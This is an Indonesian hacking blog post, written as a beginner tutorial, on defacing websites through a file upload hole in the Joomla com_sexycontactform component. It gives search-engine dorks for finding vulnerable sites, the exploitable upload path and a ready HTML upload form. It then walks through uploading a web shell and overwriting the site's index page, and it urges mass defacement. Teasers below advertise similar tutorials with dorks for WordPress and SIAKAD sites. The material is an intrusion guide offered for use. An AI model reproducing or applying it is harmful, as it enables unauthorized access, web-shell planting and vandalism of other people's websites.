Turorial Deface Website Teknik Com Sexy + Tebas Index


Assalamualaikum sobat..
Udah pada tau belum deface website teknik com_sexy?
Bagi yang newbie, nih _MisterNotFound_ ajarin :3
Tuk mastah , nyimak aje ye :v


  • BAHAN :
-          Dork :
            UMUM                                 >             inurl:/com_sexycontactform/
MY FAVORITE DORK       >             inurl:/components/com_sexycontactform/
-          Exploit :
/components/com_sexycontactform/fileupload/index.php
-         CSRF
NB : SAVE DENGAN FORMAT .html
<form method="POST"
action="http://www.TARGET.com/[path]/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>UNGGAH</button>
</form>
-          Script Deface sampeyan ;)

Shortcut : Click Here for Tutorial on Youtube


  • POC       :
-          Masukkan dork ke search engine google.
-          Pilih target. Nah, kalo ini merupakan target saya.

-          Masukkan exploitnya dibelakang url target. Jika vuln, maka akan tampil notice error.
NOTE : Jika ada path di url target, maka sampeyan harus masukkan exploitnya dibelakang path nya 



-          Kemudian seret Script Upload Button ke browser yang sedang anda gunakan.


-          Upload file Shell sampeyan.



-          Jika website vuln terhadap Shell, maka penampakannya seperti gambar dibawah ini.


-          Check Your Shell. Caranya, masukkan ‘exploit check’ ini :
components/com_sexycontactform/fileupload/files/Your Shell.php
NOTE : Cek dulu, ada path nya gak ;)
-          Dan penampakan Shell yang sudah tertanam, seperti gambar dibawah ini
-          Lalu terserah sampeyan mau diapakan tuh website. Mau mass deface ya silahkan, mau nitip nick silahkan. Nah kalo mau tebas index juga silahkan ;)
-          Cara Tebas index, seperti gambar dibawah ini
      NOTE : CARI FILE INDEX.PHP . BIASANYA ADA DI DIREKTORI UTAMA DAN BERFORMAT .PHP
-          Copy-paste-kan script sampeyan di kolom index.php
NOTE : Sebaiknya back-up dulu script index aslinya ;)



-          Jika sudah selesai, tinggal klik SAVE

-          Penampakan setelah diperawani :)
-          Selesai. Thanks for everything ;)



Comments

Post a Comment

Popular posts from this blog

Deface Teknik WP Add Admin Vulnerability

Image
Assalamualaikum sobat NOT_FOUND yang berbahagia :) (DI REVISI) Pagi yang mendung ini, saya mau ngasih tutor nih. Merubah halaman depan website dengan teknik WP-Login + Login as Admin. Perlu di perhatikan masbro, teknik ini hanya bisa dilakukan jika website tersebut menggunakan CMS Wordpress.  Sekedar info, bahwa teknik ini memanfaatkan plugin kerentanan Add admin/Register New Admin  pada direktori  wp-login.php?action=register Kelebihan tutor saya kali ini yaitu bisa menebas index (halaman awal website) tanpa harus pake Shell :) Sebenarnya ini teknik lama, tapi karena jarang di publish dan jarang banget ditemukan di google, akhirnya saya publish artikel ini dengan senang hati :v Ok, langsung caw sobat ;) Shortcut :   Click Here for Tutorial on Youtube 1. DORK UMUM: inurl:/wp-login DORK KEMBANGAN SAYA : Inurl: /wp-login.php?action=register Inurl:/register-2/ 2. Exploit : wp-admin/theme-editor.php 3. POC : - Pergi ke mbah google, lalu masukkan dork tersebut ke dal...
Read more

Deface Web Metode Bypass Admin on CMS SIAKAD

Image
Hay gan-sist Meet again nih dengan admin ganteng, hehe Di artikel ini kita akan mempelajari ilmu para script kiddies , yaitu Deface Web. Tepatnya, disini lo akan mempelajari Deface web dengan teknik bypass admin pada CMS SIAKAD (Sistem Informasi Akademik) Oiya, sebelumnya Taqqobalallohu Mina Wa Minkum , Mohon maaf lahir batin guys. Maapin gua kalo gua punya banyaaakkk salah ke lo semua, termasuk para admin web yang web-nya pernah gua anu anu hehe ;) Maapin gua juga kalo gua jarang post, hehe. Ojo lali sundul THR nya ke gua yo wkwk :p Oke oke, gak usah banyak cincong lagi, langsung otw ke topik pembahasan.. Shortcut : Click Here For Watch Tutorial Video on Youtube [+] Sesajen : 1. Dork : /?mnux=login&lgn=frm siakad inurl:"?mnux=" intext:siakad inurl:"?mnux=" intext:akademik inurl:"?mnux=" intext:sisfo inurl:"?mnux=" site:id inurl:"?mnux=" site:com inurl:"?mnux=" site:net  NOTE : Pilih salah satu dork nya mbah  2. Exploit : ...
Read more

Mengejutkan Serangan DI London sudah diprediksi diforum 4chan Anonymous

Image
Sebuah posting-an di forum online diduga memprediksi serangan teror di Gedung Parlemen Inggris. Serangan di jantung Kota London itu menyebabkan setidaknya lima orang tewas. Sebagaimana dikutip dari Independent isu serangan tersebut disebut muncul di forum 4Chan (forum utama Anonymous). Pada posting-an di forum tersebut muncul referensi mengenai lokasi serangan serta gambar dua senjata api. Namun apakah serangan tersebut memiliki hubungan dengan posting itu masih belum dapat terkonfirmasi. Sebab tidak ada referensi tanggal tepat serta bagaimana serangan itu akan terjadi. Kabar terkait hubungan posting di 4Chan tersebut dengan serangan teror di London pertama kali dihubungkan oleh netizen  yang mengklaim keduanya berhubungan. Independent mewartakan, referensi mengenai lokasi serangan teror di London juga muncul di posting-an tersebut. Sebab selain gambar dua senjata api, sang pengunggah juga memunculkan sejumlah gambar titik dan garis pemisah yang dapat diartikan menggunakan ...
Read more